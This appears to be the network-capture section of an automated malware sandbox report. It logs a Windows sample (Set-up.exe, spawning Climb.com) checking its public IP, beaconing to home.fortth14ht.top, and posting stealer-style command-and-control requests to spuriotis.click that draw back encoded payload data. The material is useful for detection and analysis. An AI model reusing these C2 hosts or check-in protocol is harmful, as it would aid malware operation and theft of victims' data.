Dec 28, 2024 09:56:53.878659010 CET	4944	OUT	Data Raw: 6c 55 63 36 34 66 34 75 79 37 68 6a 4f 63 5a 67 4b 6c 44 47 51 39 70 69 63 69 7a 4c 45 30 4b 6b 63 46 6d 46 48 45 59 61 6a 68 63 58 58 77 75 42 70 34 58 46 63 38 71 38 76 71 6c 57 6c 4b 56 44 53 6a 49 5c 2f 30 39 2b 68 5c 2f 77 44 58 38 54 5c 2f Data Ascii: lUc64f4uy7hjOcZgKlDGQ9picizLE0KkcFmFHEYajhcXXwuBp4XFc8q8vqlWlKVDSjI\/09+h\/wDX8T\/Dd47KM1jkfFHBmbcXZBgc1hXwVSphcHxDlmBxlKpjMtr0MVXxWEo4zMK2IwjjTw8HiqOIpxxCbrRPzV\/Yp+JnxN+I3gv4xDxLpGkaf8OtBvUsfhx\/Y2i6R4fs9MEyare6v4disdIsbOC4axtbjRbu5nYZgub51V
Dec 28, 2024 09:56:53.878860950 CET	4944	OUT	Data Raw: 39 5c 2f 77 42 50 5c 2f 72 31 4a 55 59 5c 2f 35 61 66 6a 5c 2f 41 46 72 4d 36 50 66 5c 2f 41 4c 76 34 6b 4d 69 34 5c 2f 44 2b 52 5c 2f 77 41 5c 2f 7a 71 47 72 46 51 76 39 34 5c 2f 68 5c 2f 49 55 47 76 4f 5c 2f 4c 2b 76 6d 56 32 58 62 6a 76 6d 6d Data Ascii: 9\/wBP\/r1JUY\/5afj\/AFrM6Pf\/ALv4kMi4\/D+R\/wA\/zqGrFQv94\/h\/IUGvO\/L+vmV2Xbjvmm1YqJ+v4f1NBqMqCSP5eufw\/wA9elT0UHQUpI\/l44+vf\/PT6fqypn+6fw\/mKhoOgh5Y\/wCeKZ\/Gn1NSydvx\/pUdB2U+vyIfmb1P8v8ADNRtGnuE6f5z\/npVqo5O34\/0oHDb5\/oinJF\/cHr2\/oP8fXm
Dec 28, 2024 09:56:53.997963905 CET	2472	OUT	Data Raw: 70 38 54 5c 2f 41 49 51 2b 45 5c 2f 42 58 6a 4c 78 68 59 65 45 68 34 43 2b 41 48 6a 4f 7a 67 30 2b 4c 53 76 69 44 34 5a 69 73 74 51 38 61 58 76 68 42 4a 72 36 37 6c 6a 6d 6a 74 72 57 33 65 37 50 35 6e 6a 50 47 48 77 77 77 4e 64 59 58 45 38 5a 35 Data Ascii: p8T\/AIQ+E\/BXjLxhYeEh4C+AHjOzg0+LSviD4ZistQ8aXvhBJr67ljmjtrW3e7P5njPGHwwwNdYXE8Z5UsY8fmeWLBUVisVjv7QyfH5flmZYP6lhcPWxX1jDY3Nssoun7HmqLH4StR9pQr06kv2HAeAnjDmVJ4nC8A539Ujl+X5rLHYn6lgcBHLM0y\/G5pgse8fjsXh8H9VqYHLcwrzre35MO8FiaOJdGvRqUo+9\/s4ftT\
Dec 28, 2024 09:56:53.998038054 CET	4944	OUT	Data Raw: 2f 77 42 41 5c 2f 77 44 77 5c 2f 58 50 5c 2f 41 45 61 79 50 5c 2f 44 34 66 5c 2f 69 67 6f 5c 2f 34 66 72 6e 5c 2f 6f 31 6b 66 2b 48 77 5c 2f 5c 2f 41 42 51 56 2b 43 6c 78 70 4f 69 2b 48 62 48 78 78 63 66 46 48 34 72 5c 2f 41 41 62 2b 44 57 6f 65 Data Ascii: /wBA\/wDw\/XP\/AEayP\/D4f\/igo\/4frn\/o1kf+Hw\/\/ABQV+ClxpOi+HbHxxcfFH4r\/AAb+DWoeBv2gvil+zNN4f8dXvxm1nWfEnxQ+D+heD\/EXi+18MH4S\/Az4n6I+i\/2X468OS6VrHiPWfDVvqBvg6iK3V7gX9F8KWmq3Hgjw1qHxT+CnhD4tfEvQdK8R\/D74E+L\/ABV44sfif4p0\/wAVWjX3w8he90n4Y65
Dec 28, 2024 09:56:53.998183966 CET	2472	OUT	Data Raw: 5c 2f 79 30 5c 2f 77 41 5c 2f 54 2b 6e 51 63 79 48 66 35 6d 7a 6c 5c 2f 73 5c 2f 39 5c 2f 77 44 44 38 61 71 37 74 76 38 41 48 38 34 34 36 5c 2f 38 41 6b 31 5c 2f 6e 31 5c 2f 43 74 43 78 35 5a 2b 55 5c 2f 37 39 53 53 66 35 5c 2f 7a 2b 74 51 5c 2f Data Ascii: \/y0\/wA\/T+nQcyHf5mzl\/s\/9\/wDD8aq7tv8AH8446\/8Ak1\/n1\/CtCx5Z+U\/79SSf5\/z+tQ\/P5e8\/J+XX\/p0\/lT\/9YB8n7r\/ll3\/zwfzzUK5+4f8ASU\/66\/v4fw5\/lXOdfO\/L+vmMm+78kfz\/AOql\/wCm3+evT0\/GFlTzHKfPH\/qvM\/5b\/wCev6Vfb+B\/3j+XL+657\/r1\/KqzbI8bPuf5\
Dec 28, 2024 09:56:53.998224974 CET	2472	OUT	Data Raw: 34 50 32 33 50 32 62 64 57 38 52 32 32 67 65 4d 4e 43 2b 4d 6e 67 33 77 78 34 47 38 44 36 4e 38 51 50 6a 5a 38 48 66 44 2b 6e 33 33 69 62 34 61 2b 4f 66 32 6a 37 61 33 38 53 65 4b 5c 2f 42 76 78 43 2b 4c 5c 2f 67 48 78 4e 38 51 49 37 7a 55 39 41 Data Ascii: 4P23P2bdW8R22geMNC+Mng3wx4G8D6N8QPjZ8HfD+n33ib4a+Of2j7a38SeK\/BvxC+L\/gHxN8QI7zU9A03U\/p2SNJUaOVEkjcYdJFDow9GVgVYexBFZj6DockQgk0XSZIQciF9Os2iByTkRtCUzkk5xnJJ71\/PnjD4C5d4uZ5wtn2Mz3HZTi+EsLjKOW08NTp1KE6+KzjIM5+s11K1VTp1OH6GGhPD1aFWOExmYUo1FLERq
Dec 28, 2024 09:56:53.998264074 CET	2472	OUT	Data Raw: 62 2b 42 50 67 7a 77 42 34 73 2b 44 48 69 72 57 66 32 4c 66 6a 39 71 66 77 5a 38 56 36 6c 72 50 67 58 78 68 61 33 70 74 74 66 2b 44 58 6a 71 77 61 44 52 72 37 55 62 78 59 37 62 53 4c 71 30 39 74 58 54 39 4d 56 35 5a 46 30 32 78 57 53 59 59 6d 6b Data Ascii: b+BPgzwB4s+DHirWf2Lfj9qfwZ8V6lrPgXxha3pttf+DXjqwaDRr7UbxY7bSLq09tXT9MV5ZF02xWSYYmkW1tw8o9JWEW6Qezk1SPhfwwwLt4c0FixLMTpGnklieSSbbJJPUnk9a\/lvNfoXZBmGdSzulxVm2Hr1834pzbF0nh8JWo1anFHG+VceVqUaVfD1sNyYTNcpo4aj7fDYj2+XVq+Fx6xjhgquD\/tDJP2hPFuV5AuH6\
Dec 28, 2024 09:56:57.466742992 CET	157	IN	HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Sat, 28 Dec 2024 08:56:57 GMT Content-Type: text/html; charset=utf-8 Content-Length: 1 Connection: close Data Raw: 30 Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.12	49717	194.87.58.92	80	6744	C:\Users\user\AppData\Local\Temp\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 09:56:57.784992933 CET	99	OUT	GET /nTrmoVgOaovBJpKSuLkP1735210003?argument=0 HTTP/1.1 Host: home.fortth14ht.top Accept: /
Dec 28, 2024 09:56:59.185481071 CET	372	IN	HTTP/1.1 404 NOT FOUND Server: nginx/1.22.1 Date: Sat, 28 Dec 2024 08:56:58 GMT Content-Type: text/html; charset=utf-8 Content-Length: 207 Connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.12	49720	194.87.58.92	80	6744	C:\Users\user\AppData\Local\Temp\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 09:56:59.649631977 CET	172	OUT	POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1 Host: home.fortth14ht.top Accept: / Content-Type: application/json Content-Length: 31 Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
Dec 28, 2024 09:57:01.076814890 CET	372	IN	HTTP/1.1 404 NOT FOUND Server: nginx/1.22.1 Date: Sat, 28 Dec 2024 08:57:00 GMT Content-Type: text/html; charset=utf-8 Content-Length: 207 Connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.12	49711	3.218.7.103	443	6744	C:\Users\user\AppData\Local\Temp\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:56:38 UTC	52	OUT	GET /ip HTTP/1.1 Host: httpbin.org Accept: /
2024-12-28 08:56:39 UTC	224	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 08:56:39 GMT Content-Type: application/json Content-Length: 31 Connection: close Server: gunicorn/19.9.0 Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: true
2024-12-28 08:56:39 UTC	31	IN	Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a Data Ascii: { "origin": "8.46.123.189"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.12	49718	104.21.2.51	443	6996	C:\Users\user\AppData\Local\Temp\768400\Climb.com

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:56:59 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: spuriotis.click
2024-12-28 08:56:59 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-28 08:57:00 UTC	1131	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 08:57:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=vl92ijf6dt03ur4t8nrpfe4uej; expires=Wed, 23 Apr 2025 02:43:39 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dPHGSxIbaJA2Z%2FaPiEUiCNp9N7B%2FFAgH1ySC9%2FTS1aAp%2Fn9Cwy0I7hx8cssY630gkqNhGZgshOBqAIdl2UE3Tt25nB5zz%2BGFzns%2FcHYsEJFAh%2BGtoTVOuM2mopiahdXp4WU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90571dfa2e7c94-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1902&min_rtt=1901&rtt_var=715&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=906&delivery_rate=1527196&cwnd=240&unsent_bytes=0&cid=bf69a8040c4caef0&ts=869&x=0"
2024-12-28 08:57:00 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-28 08:57:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.12	49721	104.21.2.51	443	6996	C:\Users\user\AppData\Local\Temp\768400\Climb.com

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:57:01 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 45 Host: spuriotis.click
2024-12-28 08:57:01 UTC	45	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 35 46 77 68 56 4d 2d 2d 6c 6c 6c 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=5FwhVM--lll&j=
2024-12-28 08:57:02 UTC	1129	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 08:57:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=a52cj6l96gja0dqj8m19lulb22; expires=Wed, 23 Apr 2025 02:43:41 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rE65xvhqg8SdpOtyUy2jfbhZx%2BdtX8Vt%2Br3DYEkOwBnSkopq2BAWqF7dJV7sE%2F3cJ%2FLkR5AniYMHSXxv4qLSjJ59XRSAb7S%2BAJN5y8utjjPRljGqDR7yy%2BQxi3xJN8wMXmo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f90572b182643c8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1693&min_rtt=1688&rtt_var=636&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=944&delivery_rate=1729857&cwnd=192&unsent_bytes=0&cid=c783de6970375f62&ts=809&x=0"
2024-12-28 08:57:02 UTC	240	IN	Data Raw: 34 39 31 63 0d 0a 38 4b 61 6c 45 69 59 7a 4b 57 35 71 69 39 35 6a 48 2b 6d 7a 73 42 74 55 59 75 56 6b 4b 30 75 71 49 32 6e 70 59 44 52 30 6a 61 6d 4c 68 4e 4d 77 48 41 63 46 54 42 6e 75 2f 46 6c 72 6d 38 62 56 4e 33 59 44 67 55 59 52 4c 63 74 50 47 6f 78 4d 46 67 4c 67 69 38 72 41 78 48 35 56 56 67 56 4d 44 2f 50 38 57 55 53 53 6b 64 56 31 64 6c 6a 48 41 55 45 70 79 30 38 4c 69 41 74 62 42 4f 48 4b 6d 4d 72 43 65 6b 4e 51 54 51 38 47 35 72 73 47 65 6f 6a 5a 33 6e 49 35 43 6f 68 47 42 32 6e 50 57 55 76 54 51 6e 6b 52 2b 63 69 39 78 39 5a 35 42 45 34 46 46 55 6a 75 73 45 45 6c 79 39 4c 56 65 54 67 45 67 51 39 44 49 38 4a 48 43 6f 30 4b 52 42 33 72 77 5a 6a 45 77 58 74 4a 57 56 6b 43 44 4f 47 77 41 48 43 49 6b 5a Data Ascii: 491c8KalEiYzKW5qi95jH+mzsBtUYuVkK0uqI2npYDR0jamLhNMwHAcFTBnu/Flrm8bVN3YDgUYRLctPGoxMFgLgi8rAxH5VVgVMD/P8WUSSkdV1dljHAUEpy08LiAtbBOHKmMrCekNQTQ8G5rsGeojZ3nI5CohGB2nPWUvTQnkR+ci9x9Z5BE4FFUjusEEly9LVeTgEgQ9DI8JHCo0KRB3rwZjEwXtJWVkCDOGwAHCIkZ
2024-12-28 08:57:02 UTC	1369	IN	Data Raw: 77 35 4d 52 6a 48 58 67 6c 36 2b 6b 49 61 6d 68 64 62 42 75 6d 4c 6a 59 72 65 4d 45 4e 64 43 31 52 49 34 62 41 50 65 49 6a 65 31 58 67 32 45 6f 67 47 53 69 48 41 52 51 47 45 44 56 6b 59 35 63 79 61 7a 63 42 2f 51 31 6c 4e 41 77 75 70 38 6b 46 36 6b 35 47 4b 4f 52 59 51 68 41 56 64 4a 4e 6b 42 46 4d 55 62 46 68 48 6a 69 38 71 45 77 58 35 46 58 45 73 65 41 4f 4b 33 42 47 2b 41 32 4e 39 30 4e 67 32 4e 43 55 6f 70 7a 30 73 42 68 41 68 53 47 2b 4c 4e 6b 73 53 48 50 67 52 57 55 30 78 51 71 5a 38 45 62 59 7a 64 78 44 73 4d 51 4a 68 49 55 47 6e 50 54 55 76 54 51 6c 34 54 37 4d 69 5a 79 38 52 34 54 30 4e 4c 48 67 37 6b 75 52 4e 37 6a 74 2f 59 65 69 51 4b 69 51 42 4b 49 4d 4e 49 44 6f 77 47 46 6c 69 76 7a 49 71 45 6e 7a 42 6c 58 45 41 41 41 76 36 38 51 57 4c 46 79 Data Ascii: w5MRjHXgl6+kIamhdbBumLjYreMENdC1RI4bAPeIje1Xg2EogGSiHARQGEDVkY5cyazcB/Q1lNAwup8kF6k5GKORYQhAVdJNkBFMUbFhHji8qEwX5FXEseAOK3BG+A2N90Ng2NCUopz0sBhAhSG+LNksSHPgRWU0xQqZ8EbYzdxDsMQJhIUGnPTUvTQl4T7MiZy8R4T0NLHg7kuRN7jt/YeiQKiQBKIMNIDowGFlivzIqEnzBlXEAAAv68QWLFy
2024-12-28 08:57:02 UTC	1369	IN	Data Raw: 4d 6a 51 42 47 4a 4d 51 42 52 63 73 46 54 6c 61 33 69 37 6a 48 30 33 4e 4f 45 33 34 50 42 75 65 37 46 7a 32 55 6e 38 73 35 4d 51 7a 48 58 67 6b 6b 79 55 6b 4e 6d 51 31 62 46 65 48 46 6e 63 48 49 65 45 52 52 52 67 6b 4d 34 72 63 43 63 49 2f 44 32 48 6b 2b 42 59 59 4d 51 32 6d 47 41 51 79 54 51 67 35 57 33 74 79 5a 68 76 4a 7a 53 6c 39 4d 47 6b 6a 32 38 68 67 39 6a 4e 32 53 49 58 59 4e 6a 77 4e 4d 4a 73 6c 4c 42 59 34 49 57 68 37 68 79 49 44 4c 77 33 42 49 57 55 45 42 42 75 32 30 43 48 61 41 31 39 4a 34 50 45 44 4a 52 6b 34 78 69 42 6c 4c 76 77 56 61 47 2b 43 4a 70 38 66 4a 66 6b 4e 48 43 78 4e 47 38 50 77 47 63 63 75 4a 6b 6e 55 2f 41 49 77 4d 54 53 6e 50 54 41 36 49 42 56 55 62 36 4d 47 63 77 38 4e 38 54 56 78 4e 44 41 2f 74 75 52 4e 34 67 74 33 65 4f 58 Data Ascii: MjQBGJMQBRcsFTla3i7jH03NOE34PBue7Fz2Un8s5MQzHXgkkyUkNmQ1bFeHFncHIeERRRgkM4rcCcI/D2Hk+BYYMQ2mGAQyTQg5W3tyZhvJzSl9MGkj28hg9jN2SIXYNjwNMJslLBY4IWh7hyIDLw3BIWUEBBu20CHaA19J4PEDJRk4xiBlLvwVaG+CJp8fJfkNHCxNG8PwGccuJknU/AIwMTSnPTA6IBVUb6MGcw8N8TVxNDA/tuRN4gt3eOX
2024-12-28 08:57:02 UTC	1369	IN	Data Raw: 56 6d 66 52 41 51 79 48 51 67 35 57 35 73 4b 41 79 73 6c 35 53 56 64 44 43 77 62 6b 74 77 64 32 6a 4e 62 55 64 44 34 4e 67 67 56 49 4c 63 4a 54 43 49 41 49 57 78 79 76 68 64 4c 44 33 7a 41 63 45 57 77 41 49 66 6d 6e 45 32 76 4c 7a 70 78 67 64 67 65 4c 52 68 46 70 79 30 34 43 68 41 70 65 47 65 44 50 6e 4d 4c 42 66 55 46 65 51 52 34 41 35 37 45 4b 63 6f 44 44 30 6e 51 79 44 49 4d 4f 51 69 4f 49 44 30 75 4d 47 68 5a 4f 72 2f 36 66 79 38 64 7a 55 68 46 55 51 68 47 70 75 77 30 39 30 35 48 65 64 7a 59 50 69 77 70 43 49 63 6c 4e 42 59 77 48 58 78 37 6e 32 5a 50 41 7a 33 46 4b 58 6b 6f 49 44 65 79 34 42 6e 6d 4e 33 70 49 33 64 67 65 66 52 68 46 70 35 32 59 2b 79 53 4e 73 56 76 43 46 69 34 54 41 66 41 51 4a 43 77 41 4c 35 62 51 4f 65 34 4c 64 32 48 41 39 44 49 77 Data Ascii: VmfRAQyHQg5W5sKAysl5SVdDCwbktwd2jNbUdD4NggVILcJTCIAIWxyvhdLD3zAcEWwAIfmnE2vLzpxgdgeLRhFpy04ChApeGeDPnMLBfUFeQR4A57EKcoDD0nQyDIMOQiOID0uMGhZOr/6fy8dzUhFUQhGpuw0905HedzYPiwpCIclNBYwHXx7n2ZPAz3FKXkoIDey4BnmN3pI3dgefRhFp52Y+ySNsVvCFi4TAfAQJCwAL5bQOe4Ld2HA9DIw
2024-12-28 08:57:02 UTC	1369	IN	Data Raw: 45 51 45 69 67 4e 51 42 4f 6a 43 67 4d 72 4b 66 30 78 5a 51 67 30 4d 37 4c 45 48 63 59 48 51 31 58 63 34 43 4d 64 49 43 53 37 51 41 56 50 4c 49 30 59 4e 2f 64 32 66 35 63 70 2f 42 45 34 46 46 55 6a 75 73 45 45 6c 79 39 6a 41 66 54 73 53 6a 67 46 48 4a 73 74 54 43 6f 59 4a 52 42 48 67 7a 35 58 49 77 58 39 43 55 45 34 47 42 4f 36 35 43 6e 4b 48 6b 5a 77 35 4d 52 6a 48 58 67 6b 48 77 31 49 63 69 41 78 64 41 50 53 4c 6a 59 72 65 4d 45 4e 64 43 31 52 49 36 72 63 4b 65 59 76 64 30 6e 30 37 41 4a 55 4a 54 69 37 42 53 68 6d 42 42 56 45 64 35 38 43 64 77 74 56 38 53 6b 4e 4f 48 68 71 70 38 6b 46 36 6b 35 47 4b 4f 51 41 48 6c 78 5a 4b 61 2f 6c 58 43 4a 30 4a 57 78 71 76 31 4e 7a 64 68 33 64 49 45 52 4e 4d 44 75 61 31 41 6e 4b 4b 32 4e 35 30 4d 77 6d 43 42 30 38 74 Data Ascii: EQEigNQBOjCgMrKf0xZQg0M7LEHcYHQ1Xc4CMdICS7QAVPLI0YN/d2f5cp/BE4FFUjusEEly9jAfTsSjgFHJstTCoYJRBHgz5XIwX9CUE4GBO65CnKHkZw5MRjHXgkHw1IciAxdAPSLjYreMENdC1RI6rcKeYvd0n07AJUJTi7BShmBBVEd58CdwtV8SkNOHhqp8kF6k5GKOQAHlxZKa/lXCJ0JWxqv1Nzdh3dIERNMDua1AnKK2N50MwmCB08t
2024-12-28 08:57:02 UTC	1369	IN	Data Raw: 67 5a 46 67 6d 68 30 74 4c 44 79 7a 41 63 45 55 67 4c 43 2b 69 32 43 48 47 45 31 74 5a 72 50 41 65 56 42 30 67 69 78 55 30 4c 68 67 39 63 46 2b 62 47 6e 73 6e 41 64 30 74 55 43 30 4a 49 37 71 52 42 4a 63 76 77 33 33 49 36 57 39 31 47 56 6d 66 52 41 51 79 48 51 67 35 57 37 38 47 58 7a 73 70 7a 53 31 4a 5a 44 51 37 37 76 41 78 33 6d 64 76 5a 66 44 73 4e 69 67 56 50 4c 38 4e 4e 47 59 49 43 56 52 32 76 68 64 4c 44 33 7a 41 63 45 57 67 62 48 75 4f 37 44 57 75 41 30 4e 46 76 4f 78 44 48 53 41 6b 34 7a 31 42 4c 30 78 52 47 41 65 6a 55 33 4e 32 48 64 30 67 52 45 30 77 4f 34 4c 6f 47 65 34 58 44 31 33 38 35 44 34 34 50 54 53 48 4c 51 51 2b 50 42 56 4d 56 34 38 43 56 78 38 68 30 54 56 39 43 41 30 69 6e 2f 41 5a 6c 79 34 6d 53 57 43 30 44 69 77 73 4a 4e 6f 5a 59 53 Data Ascii: gZFgmh0tLDyzAcEUgLC+i2CHGE1tZrPAeVB0gixU0Lhg9cF+bGnsnAd0tUC0JI7qRBJcvw33I6W91GVmfRAQyHQg5W78GXzspzS1JZDQ77vAx3mdvZfDsNigVPL8NNGYICVR2vhdLD3zAcEWgbHuO7DWuA0NFvOxDHSAk4z1BL0xRGAejU3N2Hd0gRE0wO4LoGe4XD1385D44PTSHLQQ+PBVMV48CVx8h0TV9CA0in/AZly4mSWC0DiwsJNoZYS
2024-12-28 08:57:02 UTC	1369	IN	Data Raw: 52 39 34 76 4b 68 4f 64 37 55 6c 52 4d 47 6b 72 63 76 77 39 7a 6a 4d 65 53 5a 67 6c 4f 78 77 6c 54 61 5a 42 34 45 73 73 46 57 6c 61 33 69 34 66 44 78 33 64 65 52 30 77 41 47 65 4b 78 44 56 2b 45 31 73 52 36 4f 51 4f 57 44 77 55 69 78 51 46 46 79 77 56 4f 56 72 65 4c 76 63 50 52 63 32 74 53 57 67 56 49 70 2f 77 47 61 38 75 4a 6b 6b 64 32 45 6f 51 57 53 69 62 5a 66 30 76 54 47 32 68 57 35 4e 32 56 31 4d 52 6d 54 31 78 48 48 54 61 70 35 46 55 76 32 59 4f 41 4b 79 6c 41 6d 44 6b 48 61 63 6b 42 55 37 49 62 46 67 43 76 6b 38 43 4b 68 32 49 45 43 51 74 4c 43 2f 75 75 42 33 36 64 30 70 56 48 43 43 65 52 44 45 34 35 7a 31 59 45 79 30 77 57 47 61 2b 54 71 34 54 4f 64 31 39 41 58 51 45 59 37 76 77 2b 4d 38 76 4a 6b 69 46 32 4e 59 51 49 52 79 37 65 55 45 61 73 46 46 Data Ascii: R94vKhOd7UlRMGkrcvw9zjMeSZglOxwlTaZB4EssFWla3i4fDx3deR0wAGeKxDV+E1sR6OQOWDwUixQFFywVOVreLvcPRc2tSWgVIp/wGa8uJkkd2EoQWSibZf0vTG2hW5N2V1MRmT1xHHTap5FUv2YOAKylAmDkHackBU7IbFgCvk8CKh2IECQtLC/uuB36d0pVHCCeRDE45z1YEy0wWGa+Tq4TOd19AXQEY7vw+M8vJkiF2NYQIRy7eUEasFF
2024-12-28 08:57:02 UTC	1369	IN	Data Raw: 72 4d 58 4b 66 77 68 66 51 41 77 50 2b 61 6f 61 4d 59 50 53 79 47 4d 49 50 71 77 4b 54 79 37 53 52 67 32 74 49 68 5a 59 72 38 54 53 6e 50 34 77 44 42 46 30 51 6b 6a 78 2f 46 6b 39 76 74 4c 63 64 7a 45 57 6c 6b 74 68 43 76 4a 37 53 61 63 46 51 31 54 62 7a 49 4c 56 7a 48 31 49 45 51 56 4d 44 71 6e 6b 55 54 50 4c 31 63 4d 35 62 6c 44 56 58 52 78 36 6e 78 46 5a 6c 45 78 50 56 76 6d 4c 79 70 61 4a 4d 46 59 52 45 30 78 50 36 71 34 54 65 34 6a 48 30 54 34 49 50 71 41 49 54 69 6a 65 55 52 79 45 50 47 67 44 37 4d 57 63 77 39 46 68 42 42 38 4c 41 30 69 78 68 55 45 31 79 2b 36 63 4f 53 35 41 33 30 5a 38 4b 73 5a 50 44 4a 30 54 47 7a 48 68 7a 4a 50 53 31 32 64 4c 45 51 56 4d 44 71 6e 6b 55 7a 50 4c 31 63 4d 35 62 6c 44 56 58 52 78 36 6e 78 46 5a 6c 45 78 50 56 76 6d Data Ascii: rMXKfwhfQAwP+aoaMYPSyGMIPqwKTy7SRg2tIhZYr8TSnP4wDBF0Qkjx/Fk9vtLcdzEWlkthCvJ7SacFQ1TbzILVzH1IEQVMDqnkUTPL1cM5blDVXRx6nxFZlExPVvmLypaJMFYRE0xP6q4Te4jH0T4IPqAITijeURyEPGgD7MWcw9FhBB8LA0ixhUE1y+6cOS5A30Z8KsZPDJ0TGzHhzJPS12dLEQVMDqnkUzPL1cM5blDVXRx6nxFZlExPVvm
